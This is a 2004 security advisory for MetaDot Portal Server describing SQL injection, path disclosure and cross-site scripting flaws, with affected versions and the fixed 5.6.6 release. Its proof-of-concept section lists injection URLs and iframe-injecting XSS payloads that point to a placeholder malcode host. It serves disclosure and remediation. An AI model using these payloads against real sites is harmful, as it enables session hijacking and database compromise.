MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities
BID:9439
Info
MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities
| Bugtraq ID: | 9439 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 16 2004 12:00AM |
| Updated: | Jan 16 2004 12:00AM |
| Credit: | Discovery of this issue is credited to JeiAr <[email protected]>. |
| Vulnerable: |
MetaDot MetaDot Portal Server 5.6.5 .4b5 MetaDot MetaDot Portal Server 5.6.5 .3.1 MetaDot MetaDot Portal Server 5.6.5 .3 MetaDot MetaDot Portal Server 5.6.5 .2 MetaDot MetaDot Portal Server 5.6.5 .1 MetaDot MetaDot Portal Server 5.6.5 MetaDot MetaDot Portal Server 5.6.4 .3 MetaDot MetaDot Portal Server 5.6.4 .2 MetaDot MetaDot Portal Server 5.6.4 .1 MetaDot MetaDot Portal Server 5.6.4 MetaDot MetaDot Portal Server 5.5.2 .1 |
| Not Vulnerable: |
MetaDot MetaDot Portal Server 5.6.6 |
Discussion
MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities
A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting.
A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting.
Exploit / POC
MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities
The following proof of concept examples have been provided for the various vulnerabilities:
SQL Injection:
/index.pl?id=[Evil_Query]
/index.pl?iid=[Evil_Query]
/index.pl?isa=Session&op=auto_login&new_user=&key=[Evil_Query]
Information and Path Disclosure:
/index.pl?iid=[ValidID]&isa=Discussion&op=
Cross Site Scripting:
/index.pl?isa=XSS<iframe%20src=http://www.example.com/malcode>
/userchannel.pl?id=435&isa=NewsChannel&redirect=1&op="><iframe%20src=http://www.example.com/malcode>
/index.pl?iid='"><iframe%20src=http://www.exmaple.com/malcode>
The following proof of concept examples have been provided for the various vulnerabilities:
SQL Injection:
/index.pl?id=[Evil_Query]
/index.pl?iid=[Evil_Query]
/index.pl?isa=Session&op=auto_login&new_user=&key=[Evil_Query]
Information and Path Disclosure:
/index.pl?iid=[ValidID]&isa=Discussion&op=
Cross Site Scripting:
/index.pl?isa=XSS<iframe%20src=http://www.example.com/malcode>
/userchannel.pl?id=435&isa=NewsChannel&redirect=1&op="><iframe%20src=http://www.example.com/malcode>
/index.pl?iid='"><iframe%20src=http://www.exmaple.com/malcode>
Solution / Fix
MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities
Solution:
The vendor has released version 5.6.6 to address these issues:
MetaDot MetaDot Portal Server 5.5.2 .1
MetaDot MetaDot Portal Server 5.6.4 .3
MetaDot MetaDot Portal Server 5.6.4 .1
MetaDot MetaDot Portal Server 5.6.4
MetaDot MetaDot Portal Server 5.6.4 .2
MetaDot MetaDot Portal Server 5.6.5 .3.1
MetaDot MetaDot Portal Server 5.6.5 .4b5
MetaDot MetaDot Portal Server 5.6.5
MetaDot MetaDot Portal Server 5.6.5 .3
MetaDot MetaDot Portal Server 5.6.5 .2
MetaDot MetaDot Portal Server 5.6.5 .1
Solution:
The vendor has released version 5.6.6 to address these issues:
MetaDot MetaDot Portal Server 5.5.2 .1
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.4 .3
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.4 .1
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.4
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.4 .2
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.5 .3.1
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.5 .4b5
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.5
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.5 .3
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.5 .2
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
MetaDot MetaDot Portal Server 5.6.5 .1
-
MetaDot MetaDot Portal Server 5.6.6
http://www.metadot.com/public/metadot5.6.6.tar.gz
References
MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities
References:
References:
- Home Page (MetaDot)
- Multiple MetaDot Vulnerabilities (JeiAr
)